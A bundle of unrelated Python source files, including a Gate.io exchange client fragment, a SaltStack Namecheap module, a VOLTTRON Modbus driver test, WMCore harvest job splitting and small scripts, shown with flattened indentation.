# finish_as: "cancelled",
# status: "finished",
# is_liq: False,
# refu: "0",
# is_close: False,
# iceberg: "0",
# }
return self.parse_order(response, market)
def transfer(self, code, amount, fromAccount, toAccount, params={}):
self.load_markets()
currency = self.currency(code)
accountsByType = self.safe_value(self.options, 'accountsByType', {})
fromId = self.safe_string(accountsByType, fromAccount, fromAccount)
toId = self.safe_string(accountsByType, toAccount, toAccount)
if fromId is None:
keys = list(accountsByType.keys())
raise ExchangeError(self.id + ' fromAccount must be one of ' + ', '.join(keys))
if toId is None:
keys = list(accountsByType.keys())
raise ExchangeError(self.id + ' toAccount must be one of ' + ', '.join(keys))
truncated = self.currency_to_precision(code, amount)
request = {
'currency': currency['id'],
'from': fromId,
'to': toId,
'amount': truncated,
}
if (toId == 'futures') or (toId == 'delivery'):
request['settle'] = currency['id']
response = self.privateWalletPostTransfers(self.extend(request, params))
#
# according to the docs
#
# {
# "currency": "BTC",
# "from": "spot",
# "to": "margin",
# "amount": "1",
# "currency_pair": "BTC_USDT"
# }
#
# actual response
#
# POST https://api.gateio.ws/api/v4/wallet/transfers 204 No Content
#
return {
'info': response,
'from': fromId,
'to': toId,
'amount': truncated,
'code': code,
}
def set_leverage(self, leverage, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' setLeverage() requires a symbol argument')
# WARNING: THIS WILL INCREASE LIQUIDATION PRICE FOR OPEN ISOLATED LONG POSITIONS
# AND DECREASE LIQUIDATION PRICE FOR OPEN ISOLATED SHORT POSITIONS
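# hypothetical usage sketch, symbol and values are placeholders, not from this file:
# set_leverage(5, 'BTC/USDT') posts leverage=5 for an isolated position, while passing
# {'cross_leverage_limit': 10} together with leverage=0 switches the request to cross margin (see below)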
if (leverage < 0) or (leverage > 100):
raise BadRequest(self.id + ' leverage should be between 1 and 100')
self.load_markets()
market = self.market(symbol)
method = self.get_supported_mapping(market['type'], {
'swap': 'privateFuturesPostSettlePositionsContractLeverage',
'futures': 'privateDeliveryPostSettlePositionsContractLeverage',
})
request = self.prepare_request(market)
request['query'] = {
'leverage': str(leverage),
}
if 'cross_leverage_limit' in params:
if leverage != 0:
raise BadRequest(self.id + ' cross_leverage_limit is only valid when leverage is 0')
request['cross_leverage_limit'] = str(params['cross_leverage_limit'])
params = self.omit(params, 'cross_leverage_limit')
response = getattr(self, method)(self.extend(request, params))
#
# {
# "value":"0",
# "leverage":"5",
# "mode":"single",
# "realised_point":"0",
# "contract":"BTC_USDT",
# "entry_price":"0",
# "mark_price":"62035.86",
# "history_point":"0",
# "realised_pnl":"0",
# "close_order":null,
# "size":0,
# "cross_leverage_limit":"0",
# "pending_orders":0,
# "adl_ranking":6,
# "maintenance_rate":"0.005",
# "unrealised_pnl":"0",
# "user":2436035,
# "leverage_max":"100",
# "history_pnl":"0",
# "risk_limit":"1000000",
# "margin":"0",
# "last_close_pnl":"0",
# "liq_price":"0"
# }
#
return response
def sign(self, path, api=[], method='GET', params={}, headers=None, body=None):
authentication = api[0] # public, private
type = api[1] # spot, margin, futures, delivery
query = self.omit(params, self.extract_params(path))
path = self.implode_params(path, params)
endPart = '' if (path == '') else ('/' + path)
entirePath = '/' + type + endPart
url = self.urls['api'][authentication] + entirePath
if authentication == 'public':
if query:
url += '?' + self.urlencode(query)
else:
queryString = ''
if (method == 'GET') or (method == 'DELETE'):
if query:
queryString = self.urlencode(query)
url += '?' + queryString
else:
urlQueryParams = self.safe_value(query, 'query', {})
if urlQueryParams:
queryString = self.urlencode(urlQueryParams)
url += '?' + queryString
query = self.omit(query, 'query')
body = self.json(query)
bodyPayload = '' if (body is None) else body
bodySignature = self.hash(self.encode(bodyPayload), 'sha512')
timestamp = self.seconds()
timestampString = str(timestamp)
signaturePath = '/api/' + self.version + entirePath
payloadArray = [method.upper(), signaturePath, queryString, bodySignature, timestampString]
# eslint-disable-next-line quotes
payload = "\n".join(payloadArray)
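# illustrative payload layout (five newline-separated fields, values below are placeholders):
# GET
# /api/v4/spot/accounts
# currency=BTC
# <sha512 hex digest of the request body, or of the empty string>
# 1634345973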
signature = self.hmac(self.encode(payload), self.encode(self.secret), hashlib.sha512)
headers = {
'KEY': self.apiKey,
'Timestamp': timestampString,
'SIGN': signature,
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
label = self.safe_string(response, 'label')
if label is not None:
message = self.safe_string_2(response, 'message', 'detail', '')
Error = self.safe_value(self.exceptions, label, ExchangeError)
raise Error(self.id + ' ' + message)
|
py | 1a303f5dd3f04b543141a87c6dbda94b607b0415 | # -*- coding: utf-8 -*-
'''
Namecheap domains management
.. versionadded:: 2017.7.0
General Notes
-------------
Use this module to manage domains through the namecheap
api. The Namecheap settings will be set in grains.
Installation Prerequisites
--------------------------
- This module uses the following python libraries to communicate to
the namecheap API:
* ``requests``
.. code-block:: bash
pip install requests
- As saltstack depends on ``requests`` this shouldn't be a problem
Prerequisite Configuration
--------------------------
- The namecheap username, api key and url should be set in a minion
configuration file or pillar
.. code-block:: yaml
namecheap.name: companyname
namecheap.key: a1b2c3d4e5f67a8b9c0d1e2f3
namecheap.client_ip: 162.155.30.172
#Real url
namecheap.url: https://api.namecheap.com/xml.response
#Sandbox url
#namecheap.url: https://api.sandbox.namecheap.com/xml.response
'''
from __future__ import absolute_import, print_function, unicode_literals
CAN_USE_NAMECHEAP = True
try:
import salt.utils.namecheap
except ImportError:
CAN_USE_NAMECHEAP = False
# Import 3rd-party libs
from salt.ext import six
def __virtual__():
'''
Check to make sure requests and xml are installed
'''
if CAN_USE_NAMECHEAP:
return 'namecheap_domains'
return False
def reactivate(domain_name):
'''
Try to reactivate the expired domain name
returns the following information in a dictionary
issuccess bool indicates whether the domain was renewed successfully
amount charged for reactivation
orderid unique integer value for the order
transactionid unique integer value for the transaction
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.reactivate my-domain-name
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.reactivate')
opts['DomainName'] = domain_name
response_xml = salt.utils.namecheap.post_request(opts)
if response_xml is None:
return {}
domainreactivateresult = response_xml.getElementsByTagName('DomainReactivateResult')[0]
return salt.utils.namecheap.xml_to_dict(domainreactivateresult)
def renew(domain_name, years, promotion_code=None):
'''
Try to renew the specified expiring domain name for a specified number of years
returns the following information in a dictionary
renew bool indicates whether the domain was renewed successfully
domainid unique integer value for the domain
orderid unique integer value for the order
transactionid unique integer value for the transaction
amount charged for renewal
Required parameters:
domain_name
string The domain name you wish to renew
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.renew my-domain-name 5
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.renew')
opts['DomainName'] = domain_name
opts['Years'] = years
if promotion_code is not None:
opts['PromotionCode'] = promotion_code
response_xml = salt.utils.namecheap.post_request(opts)
if response_xml is None:
return {}
domainrenewresult = response_xml.getElementsByTagName("DomainRenewResult")[0]
return salt.utils.namecheap.xml_to_dict(domainrenewresult)
def create(domain_name, years, **kwargs):
'''
Try to create the specified domain name for the specified number of years
returns the following information in a dictionary
registered True/False
amount charged for registration
domainid unique integer value for the domain
orderid unique integer value for the order
transactionid unique integer value for the transaction
whoisguardenable True,False if enabled for this domain
nonrealtimedomain True,False if domain registration is instant or not
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.create my-domain-name 2
'''
idn_codes = set(['afr',
'alb',
'ara',
'arg',
'arm',
'asm',
'ast',
'ave',
'awa',
'aze',
'bak',
'bal',
'ban',
'baq',
'bas',
'bel',
'ben',
'bho',
'bos',
'bul',
'bur',
'car',
'cat',
'che',
'chi',
'chv',
'cop',
'cos',
'cze',
'dan',
'div',
'doi',
'dut',
'eng',
'est',
'fao',
'fij',
'fin',
'fre',
'fry',
'geo',
'ger',
'gla',
'gle',
'gon',
'gre',
'guj',
'heb',
'hin',
'hun',
'inc',
'ind',
'inh',
'isl',
'ita',
'jav',
'jpn',
'kas',
'kaz',
'khm',
'kir',
'kor',
'kur',
'lao',
'lav',
'lit',
'ltz',
'mal',
'mkd',
'mlt',
'mol',
'mon',
'mri',
'msa',
'nep',
'nor',
'ori',
'oss',
'pan',
'per',
'pol',
'por',
'pus',
'raj',
'rum',
'rus',
'san',
'scr',
'sin',
'slo',
'slv',
'smo',
'snd',
'som',
'spa',
'srd',
'srp',
'swa',
'swe',
'syr',
'tam',
'tel',
'tgk',
'tha',
'tib',
'tur',
'ukr',
'urd',
'uzb',
'vie',
'wel',
'yid'])
require_opts = ['AdminAddress1', 'AdminCity', 'AdminCountry', 'AdminEmailAddress', 'AdminFirstName',
'AdminLastName', 'AdminPhone', 'AdminPostalCode', 'AdminStateProvince', 'AuxBillingAddress1',
'AuxBillingCity', 'AuxBillingCountry', 'AuxBillingEmailAddress', 'AuxBillingFirstName',
'AuxBillingLastName', 'AuxBillingPhone', 'AuxBillingPostalCode', 'AuxBillingStateProvince',
'RegistrantAddress1', 'RegistrantCity', 'RegistrantCountry', 'RegistrantEmailAddress',
'RegistrantFirstName', 'RegistrantLastName', 'RegistrantPhone', 'RegistrantPostalCode',
'RegistrantStateProvince', 'TechAddress1', 'TechCity', 'TechCountry', 'TechEmailAddress',
'TechFirstName', 'TechLastName', 'TechPhone', 'TechPostalCode', 'TechStateProvince', 'Years']
opts = salt.utils.namecheap.get_opts('namecheap.domains.create')
opts['DomainName'] = domain_name
opts['Years'] = six.text_type(years)
def add_to_opts(opts_dict, kwargs, value, suffix, prefices):
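# Propagates a contact field to the other contact prefixes when the caller did not
# supply them explicitly. For example (illustrative values), RegistrantFirstName='Jane'
# also fills TechFirstName, AdminFirstName, AuxBillingFirstName and BillingFirstName,
# unless those keys were already present in kwargs.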
for prefix in prefices:
nextkey = prefix + suffix
if nextkey not in kwargs:
opts_dict[nextkey] = value
for key, value in six.iteritems(kwargs):
if key.startswith('Registrant'):
add_to_opts(opts, kwargs, value, key[10:], ['Tech', 'Admin', 'AuxBilling', 'Billing'])
if key.startswith('Tech'):
add_to_opts(opts, kwargs, value, key[4:], ['Registrant', 'Admin', 'AuxBilling', 'Billing'])
if key.startswith('Admin'):
add_to_opts(opts, kwargs, value, key[5:], ['Registrant', 'Tech', 'AuxBilling', 'Billing'])
if key.startswith('AuxBilling'):
add_to_opts(opts, kwargs, value, key[10:], ['Registrant', 'Tech', 'Admin', 'Billing'])
if key.startswith('Billing'):
add_to_opts(opts, kwargs, value, key[7:], ['Registrant', 'Tech', 'Admin', 'AuxBilling'])
if key == 'IdnCode' and value not in idn_codes:
salt.utils.namecheap.log.error('Invalid IdnCode')
raise Exception('Invalid IdnCode')
opts[key] = value
for requiredkey in require_opts:
if requiredkey not in opts:
salt.utils.namecheap.log.error("Missing required parameter '" + requiredkey + "'")
raise Exception("Missing required parameter '" + requiredkey + "'")
response_xml = salt.utils.namecheap.post_request(opts)
if response_xml is None:
return {}
domainresult = response_xml.getElementsByTagName("DomainCreateResult")[0]
return salt.utils.namecheap.atts_to_dict(domainresult)
def check(*domains_to_check):
'''
Checks the availability of domains
returns a dictionary where the domain name is the key and
the availability is the value of True/False
domains_to_check
array of strings List of domains to check
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.check domain-to-check
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.check')
opts['DomainList'] = ','.join(domains_to_check)
response_xml = salt.utils.namecheap.get_request(opts)
if response_xml is None:
return {}
domains_checked = {}
for result in response_xml.getElementsByTagName("DomainCheckResult"):
available = result.getAttribute("Available")
domains_checked[result.getAttribute("Domain").lower()] = salt.utils.namecheap.string_to_value(available)
return domains_checked
def get_info(domain_name):
'''
Returns information about the requested domain
returns a dictionary of information about the domain_name
domain_name
string Domain name to get information about
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.get_info my-domain-name
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.getinfo')
opts['DomainName'] = domain_name
response_xml = salt.utils.namecheap.get_request(opts)
if response_xml is None:
return []
domaingetinforesult = response_xml.getElementsByTagName("DomainGetInfoResult")[0]
return salt.utils.namecheap.xml_to_dict(domaingetinforesult)
def get_tld_list():
'''
Returns a list of TLDs as objects
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.get_tld_list
'''
response_xml = salt.utils.namecheap.get_request(salt.utils.namecheap.get_opts('namecheap.domains.gettldlist'))
if response_xml is None:
return []
tldresult = response_xml.getElementsByTagName("Tlds")[0]
tlds = []
for e in tldresult.getElementsByTagName("Tld"):
tld = salt.utils.namecheap.atts_to_dict(e)
tld['data'] = e.firstChild.data
categories = []
subcategories = e.getElementsByTagName("Categories")[0]
for c in subcategories.getElementsByTagName("TldCategory"):
categories.append(salt.utils.namecheap.atts_to_dict(c))
tld['categories'] = categories
tlds.append(tld)
return tlds
def get_list(list_type=None,
search_term=None,
page=None,
page_size=None,
sort_by=None):
'''
Returns a list of domains for the particular user as a list of objects
offset by ``page`` length of ``page_size``
list_type
string Possible values are ALL/EXPIRING/EXPIRED
Default: ALL
search_term
string Keyword to look for on the domain list
page
integer Page to return
Default: 1
page_size
integer Number of domains to be listed in a page
Minimum value is 10 and maximum value is 100
Default: 20
sort_by
string Possible values are NAME/NAME_DESC/EXPIREDATE/
EXPIREDATE_DESC/CREATEDATE/CREATEDATE_DESC
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.get_list
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.getList')
if list_type is not None:
if list_type not in ['ALL', 'EXPIRING', 'EXPIRED']:
salt.utils.namecheap.log.error('Invalid option for list_type')
raise Exception('Invalid option for list_type')
opts['ListType'] = list_type
if search_term is not None:
if len(search_term) > 70:
salt.utils.namecheap.log.warning('search_term trimmed to first 70 characters')
search_term = search_term[0:70]
opts['SearchTerm'] = search_term
if page is not None:
opts['Page'] = page
if page_size is not None:
if page_size > 100 or page_size < 10:
salt.utils.namecheap.log.error('Invalid option for page')
raise Exception('Invalid option for page')
opts['PageSize'] = page_size
if sort_by is not None:
if sort_by not in ['NAME', 'NAME_DESC', 'EXPIREDATE', 'EXPIREDATE_DESC', 'CREATEDATE', 'CREATEDATE_DESC']:
salt.utils.namecheap.log.error('Invalid option for sort_by')
raise Exception('Invalid option for sort_by')
opts['SortBy'] = sort_by
response_xml = salt.utils.namecheap.get_request(opts)
if response_xml is None:
return []
domainresult = response_xml.getElementsByTagName("DomainGetListResult")[0]
domains = []
for d in domainresult.getElementsByTagName("Domain"):
domains.append(salt.utils.namecheap.atts_to_dict(d))
return domains
|
py | 1a304133d9c9c3a4d15a88abf0d59cfa798ca46c | import pytest
import gevent
import logging
import time
from volttron.platform import get_services_core
from master_driver.interfaces.modbus_tk.server import Server
from master_driver.interfaces.modbus_tk.maps import Map, Catalog
logger = logging.getLogger(__name__)
# modbus_tk driver config
DRIVER_CONFIG_STRING = """{
"driver_config": {
"name": "write_single_registers",
"device_address": "127.0.0.1",
"port": 5020,
"slave_id": 1,
"baudrate": 9600,
"bytesize": 8,
"parity": "none",
"stopbits": 1,
"xonxoff": 0,
"addressing": "offset",
"endian": "big",
"write_multiple_registers": false,
"register_map": "config://write_single_registers_map.csv"
},
"driver_type": "modbus_tk",
"registry_config": "config://write_single_registers.csv",
"interval": 120,
"timezone": "UTC"
}"""
# modbus_tk csv config
REGISTRY_CONFIG_STRING = """Volttron Point Name,Register Name
unsigned short,unsigned_short
sample bool,sample_bool"""
REGISTRY_CONFIG_MAP = """Register Name,Address,Type,Units,Writable,Default Value,Transform
unsigned_short,0,uint16,None,TRUE,0,scale(10)
sample_bool,16,bool,None,TRUE,False,"""
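# Note (added for clarity): the driver config above references these two CSV blobs via
# "config://write_single_registers.csv" and "config://write_single_registers_map.csv";
# the `agent` fixture below stores them in the platform.driver config store under exactly
# those names, so the modbus_tk interface can resolve them at startup.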
@pytest.fixture(scope="module")
def agent(request, volttron_instance):
"""Build MasterDriverAgent, add modbus driver & csv configurations
"""
# Build master driver agent
md_agent = volttron_instance.build_agent()
# Clean out master driver configurations
md_agent.vip.rpc.call('config.store',
'manage_delete_store',
'platform.driver')
# Add driver configurations
md_agent.vip.rpc.call('config.store',
'manage_store',
'platform.driver',
'devices/write_single_registers',
DRIVER_CONFIG_STRING,
config_type='json')
# Add csv configurations
md_agent.vip.rpc.call('config.store',
'manage_store',
'platform.driver',
'write_single_registers.csv',
REGISTRY_CONFIG_STRING,
config_type='csv')
md_agent.vip.rpc.call('config.store',
'manage_store',
'platform.driver',
'write_single_registers_map.csv',
REGISTRY_CONFIG_MAP,
config_type='csv')
master_uuid = volttron_instance.install_agent(agent_dir=get_services_core("MasterDriverAgent"),
config_file={},
start=True)
gevent.sleep(10) # wait for the agent to start and start the devices
def stop():
"""Stop master driver agent
"""
volttron_instance.stop_agent(master_uuid)
md_agent.core.stop()
request.addfinalizer(stop)
return md_agent
@pytest.fixture(scope='class')
def modbus_server(request):
ModbusClient = Catalog()['write_single_registers'].get_class()
server_process = Server(address='127.0.0.1', port=5020)
server_process.define_slave(1, ModbusClient, unsigned=False)
server_process.start()
time.sleep(1)
yield server_process
time.sleep(1)
server_process.stop()
@pytest.mark.usefixtures("modbus_server")
class TestModbusTKDriver:
"""
Regression tests for the write_single_registers driver interface.
"""
def get_point(self, agent, point_name):
"""
Issue a get_point RPC call for the named point and return the result.
@param agent: The test Agent.
@param point_name: The name of the point to query.
@return: The actual reading value of the point name from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'get_point', 'write_single_registers', point_name).get(timeout=10)
def set_point(self, agent, point_name, point_value):
"""
Issue a set_point RPC call for the named point and value, and return the result.
@param agent: The test Agent.
@param point_name: The name of the point to query.
@param point_value: The value to set on the point.
@return:The actual reading value of the point name from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'set_point', 'write_single_registers', point_name, point_value).get(timeout=10)
def scrape_all(self, agent):
"""
        Issue a scrape_all RPC call for the device and return the result.
@param agent: The test Agent.
@return: The dictionary mapping point names to their actual values from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'scrape_all', 'write_single_registers').get(timeout=10)
def revert_all(self, agent):
"""
        Issue a revert_device RPC call for the device and return the result.
@param agent: The test Agent.
@return: Return value from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'revert_device', 'write_single_registers').get(timeout=10)
def revert_point(self, agent, point_name):
"""
        Issue a revert_point RPC call for the named point and return the result.
@param agent: The test Agent.
@param point_name: The name of the point to query.
@return: Return value from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'revert_point', 'write_single_registers', point_name).get(timeout=10)
def test_default_values(self, agent):
"""Test set default values
"""
self.revert_all(agent)
default_values = self.scrape_all(agent)
assert type(default_values) is dict
for key in default_values.keys():
assert default_values[key] == 0
def test_set_point(self, agent):
"""Test set points to a new values
"""
set_value = self.set_point(agent, 'unsigned short', 6530)
assert set_value == 6530
set_value = self.set_point(agent, 'sample bool', True)
assert set_value == True
def test_get_point(self, agent):
"""Test get point after set point
"""
self.set_point(agent, 'unsigned short', 1230)
get_value = self.get_point(agent, 'unsigned short')
assert get_value == 1230
def test_revert_point(self, agent):
"""Test revert point to default value
"""
self.revert_point(agent, 'unsigned short')
get_value = self.get_point(agent, 'unsigned short')
assert get_value == 0
self.revert_point(agent, 'sample bool')
get_value = self.get_point(agent, 'sample bool')
assert get_value == False
def test_revert_all(self, agent):
"""Test revert device to default values
"""
self.revert_all(agent)
default_values = self.scrape_all(agent)
assert type(default_values) is dict
for key in default_values.keys():
assert default_values[key] == 0 |
py | 1a3041f1905cd4b062404e47d44d5493d384fed3 |
from fastlogging import LogInit
if __name__ == "__main__":
logger = LogInit(console = True, colors = True)
logger.debug("This is a debug message.")
logger.info("This is an info message.")
logger.warning("This is a warning message.")
logger.error("This is an error message.")
logger.fatal("This is a fatal message.")
logger.rotate()
logger.fatal("This is a fatal message.")
logger.fatal("This is a fatal message.")
logger.fatal("This is a fatal message.")
logger.shutdown()
|
py | 1a30420fa31052ced8b302cf5e349419c884389f | #!/usr/bin/env python
"""
_Harvest_
"""
from future.utils import viewitems
import threading
import logging
from WMCore.JobSplitting.JobFactory import JobFactory
from WMCore.Services.UUIDLib import makeUUID
from WMCore.DAOFactory import DAOFactory
from WMCore.JobSplitting.LumiBased import isGoodRun, isGoodLumi
from WMCore.DataStructs.Run import Run
from WMCore.WMSpec.WMTask import buildLumiMask
class Harvest(JobFactory):
"""
_Harvest_
    Job splitting algorithm which creates a single job for all files
    in the fileset (not necessarily just available files).
Two distinct modes, Periodic and EndOfRun.
In Periodic mode, we periodically create a job processing all
files. A job will not be created until the previous job (if
there is one) has been completed and there are new available
files in the fileset. The specified period is the amount of
time in seconds between the end of a job and the creation of
another job.
In EndOfRun mode, create a job processing all files once the
    input fileset has been closed. This means there will only be
a single job in total for the subscription.
    For the EndOfRun mode, support a sibling parameter that is
    set if there is also a Periodic subscription. In this case
wait until the Periodic subscription is finished before
triggering the EndOfRun harvesting.
"""
def createJobsLocationWise(self, fileset, endOfRun, dqmHarvestUnit, lumiMask, goodRunList):
myThread = threading.currentThread()
fileset.loadData(parentage=0)
allFiles = fileset.getFiles()
# sort by location and run
locationDict = {}
runDict = {}
for fileInfo in allFiles:
locSet = frozenset(fileInfo['locations'])
runSet = fileInfo.getRuns()
if len(locSet) == 0:
logging.error("File %s has no locations!", fileInfo['lfn'])
if len(runSet) == 0:
logging.error("File %s has no run information!", fileInfo['lfn'])
# Populate a dictionary with [location][run] so we can split jobs according to those different combinations
if locSet not in locationDict:
locationDict[locSet] = {}
fileInfo['runs'] = set()
# Handle jobs with run whitelist/blacklist
if goodRunList:
runDict[fileInfo['lfn']] = set()
for run in runSet:
if run.run in goodRunList:
runDict[fileInfo['lfn']].add(run)
if run.run in locationDict[locSet]:
locationDict[locSet][run.run].append(fileInfo)
else:
locationDict[locSet][run.run] = [fileInfo]
elif lumiMask:
# it has lumiMask, thus we consider only good run/lumis
newRunSet = []
for run in runSet:
if not isGoodRun(lumiMask, run.run):
continue
# then loop over lumis
maskedLumis = []
for lumi in run.lumis:
if not isGoodLumi(lumiMask, run.run, lumi):
continue
maskedLumis.append(lumi)
if not maskedLumis:
continue
maskedRun = Run(run.run, *maskedLumis)
newRunSet.append(maskedRun)
if run.run in locationDict[locSet]:
locationDict[locSet][run.run].append(fileInfo)
else:
locationDict[locSet][run.run] = [fileInfo]
if newRunSet:
runDict[fileInfo['lfn']] = newRunSet
else:
# no LumiList and no run white or black list
runDict[fileInfo['lfn']] = runSet
for run in runSet:
if run.run in locationDict[locSet]:
locationDict[locSet][run.run].append(fileInfo)
else:
locationDict[locSet][run.run] = [fileInfo]
# create separate jobs for different locations
self.newGroup()
self.jobCount = 0
baseName = makeUUID()
self.newGroup()
if endOfRun:
harvestType = "EndOfRun"
else:
harvestType = "Periodic"
for location in locationDict:
if dqmHarvestUnit == "byRun":
self.createJobByRun(locationDict, location, baseName, harvestType, runDict, endOfRun)
else:
self.createMultiRunJob(locationDict, location, baseName, harvestType, runDict, endOfRun)
return
def createJobByRun(self, locationDict, location, baseName, harvestType, runDict, endOfRun):
"""
_createJobByRun_
Creates one job per run for all files available at the same location.
"""
for run in locationDict[location]:
# Should create at least one job for every location/run, putting this here will do
self.jobCount += 1
self.newJob(name="%s-%s-Harvest-%i" % (baseName, harvestType, self.jobCount))
for f in locationDict[location][run]:
for fileRun in runDict[f['lfn']]:
if fileRun.run == run:
self.currentJob['mask'].addRun(fileRun)
break
self.currentJob.addFile(f)
if endOfRun:
self.currentJob.addBaggageParameter("runIsComplete", True)
self.mergeLumiRange(self.currentJob['mask']['runAndLumis'])
return
def createMultiRunJob(self, locationDict, location, baseName, harvestType, runDict, endOfRun):
"""
_createMultiRunJob_
Creates a single harvesting job for all files and runs available
at the same location.
"""
self.jobCount += 1
self.newJob(name="%s-%s-Harvest-%i" % (baseName, harvestType, self.jobCount))
for run in locationDict[location]:
for f in locationDict[location][run]:
for fileRun in runDict[f['lfn']]:
if fileRun.run == run:
self.currentJob['mask'].addRun(fileRun)
break
if f not in self.currentJob['input_files']:
self.currentJob.addFile(f)
if endOfRun:
self.currentJob.addBaggageParameter("runIsComplete", True)
self.mergeLumiRange(self.currentJob['mask']['runAndLumis'])
# now calculate the minimum and maximum run number, it has to go to the root name
minRun = min(self.currentJob['mask']['runAndLumis'].keys())
maxRun = max(self.currentJob['mask']['runAndLumis'].keys())
self.currentJob.addBaggageParameter("multiRun", True)
self.currentJob.addBaggageParameter("runLimits", "-%s-%s" % (minRun, maxRun))
return
def mergeLumiRange(self, runLumis):
"""
_mergeLumiRange_
        Merges overlapping or adjacent lumi ranges.
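        Illustrative example (not from the original docstring): a lumi list of
        [[1, 4], [3, 7], [9, 10]] collapses to [[1, 7], [9, 10]], since ranges
        that overlap or touch are fused into one.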
"""
for run, lumis in viewitems(runLumis):
lumis.sort(key=lambda sublist: sublist[0])
fixedLumis = [lumis[0]]
for lumi in lumis:
if (fixedLumis[-1][1] + 1) >= lumi[0]:
fixedLumis[-1][1] = lumi[1]
else:
fixedLumis.append(lumi)
self.currentJob['mask']['runAndLumis'][run] = fixedLumis
def algorithm(self, *args, **kwargs):
"""
_algorithm_
"""
myThread = threading.currentThread()
periodicInterval = kwargs.get("periodic_harvest_interval", 0)
periodicSibling = kwargs.get("periodic_harvest_sibling", False)
dqmHarvestUnit = kwargs.get("dqmHarvestUnit", "byRun")
runs = kwargs.get("runs", None)
lumis = kwargs.get("lumis", None)
runWhitelist = set(kwargs.get('runWhitelist', []))
runBlacklist = set(kwargs.get('runBlacklist', []))
goodRunList = runWhitelist.difference(runBlacklist)
daoFactory = DAOFactory(package="WMCore.WMBS",
logger=myThread.logger,
dbinterface=myThread.dbi)
releasePeriodicJobDAO = daoFactory(classname="JobSplitting.ReleasePeriodicJob")
periodicSiblingCompleteDAO = daoFactory(classname="JobSplitting.PeriodicSiblingComplete")
fileset = self.subscription.getFileset()
fileset.load()
lumiMask = {}
if runs and lumis:
lumiMask = buildLumiMask(runs, lumis)
if periodicInterval and periodicInterval > 0:
# Trigger the Periodic Job if
# * it is the first job OR
# * the last job ended more than periodicInterval seconds ago
triggerJob = releasePeriodicJobDAO.execute(subscription=self.subscription["id"], period=periodicInterval)
if triggerJob:
myThread.logger.debug("Creating Periodic harvesting job")
self.createJobsLocationWise(fileset, False, dqmHarvestUnit, lumiMask, goodRunList)
elif not fileset.open:
# Trigger the EndOfRun job if
# * (same as Periodic to not have JobCreator go nuts and stop after the first iteration)
# * there is no Periodic sibling subscription OR
# * the Periodic sibling subscription is complete
triggerJob = releasePeriodicJobDAO.execute(subscription=self.subscription["id"], period=3600)
if triggerJob and periodicSibling:
triggerJob = periodicSiblingCompleteDAO.execute(subscription=self.subscription["id"])
if triggerJob:
myThread.logger.debug("Creating EndOfRun harvesting job")
self.createJobsLocationWise(fileset, True, dqmHarvestUnit, lumiMask, goodRunList)
return
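    # Illustrative splitting arguments (hypothetical values, not taken from a real
    # workflow) showing how algorithm() above is typically parameterised:
    #   {"periodic_harvest_interval": 8 * 3600,   # seconds between Periodic jobs
    #    "periodic_harvest_sibling": False,       # no sibling Periodic subscription
    #    "dqmHarvestUnit": "byRun",               # one harvesting job per run
    #    "runWhitelist": [194050, 194075]}        # optional run filtering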
|
py | 1a30423226ce9ab558f07c0ade68374e66048de9 | Experiment(description='Trying latest code on classic data sets',
data_dir='../data/tsdlr-renamed/',
max_depth=10,
random_order=False,
k=1,
debug=False,
local_computation=False,
n_rand=9,
sd=2,
jitter_sd=0.1,
max_jobs=400,
verbose=False,
make_predictions=False,
skip_complete=True,
results_dir='../results/2014-01-16-GPSS-full/',
iters=250,
base_kernels='SE,Per,Lin,Const,Noise',
random_seed=3,
period_heuristic=3,
max_period_heuristic=5,
period_heuristic_type='min',
subset=True,
subset_size=250,
full_iters=10,
bundle_size=5,
additive_form=False,
mean='ff.MeanZero()', # Starting mean
kernel='ff.NoiseKernel()', # Starting kernel
lik='ff.LikGauss(sf=-np.Inf)', # Starting likelihood
score='bic',
search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}),
('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', 'B', {'A': 'kernel', 'B': 'base'}),
('A', ('CP', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('CW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('B', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('BL', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('None',), {'A': 'kernel'})])
|
py | 1a30435be98cac62eb2411e405c70fd46cae1f64 | movie_budget = float(input())
amount_of_statists = int(input())
price_for_clothes_for_one_statist = float(input())
decor = movie_budget * (10/100)
total_price_for_clothes = price_for_clothes_for_one_statist * amount_of_statists
if amount_of_statists > 150:
total_price_for_clothes *= 0.90
total_movie_amount = total_price_for_clothes + decor
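# Worked example (illustrative input, not part of the task statement): budget = 20000,
# statists = 120, price per statist = 55.50 ->
#   decor   = 20000 * 0.10       = 2000.00
#   clothes = 120 * 55.50        = 6660.00   (no discount, since 120 <= 150)
#   total   = 6660.00 + 2000.00  = 8660.00   -> "Action!" with 11340.00 leva left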
if total_price_for_clothes + decor > movie_budget:
print("Not enough money!")
print(f"Wingard needs {total_movie_amount - movie_budget:.2f} leva more.")
elif total_price_for_clothes + decor <= movie_budget:
print("Action!")
print(f"Wingard starts filming with {movie_budget - total_movie_amount:.2f} leva left.") |
py | 1a30438cf9de8ad0ff1abc9511083c8c94a41afd | from setuptools import setup, find_packages
with open('README.md') as f:
readme = f.read()
setup(
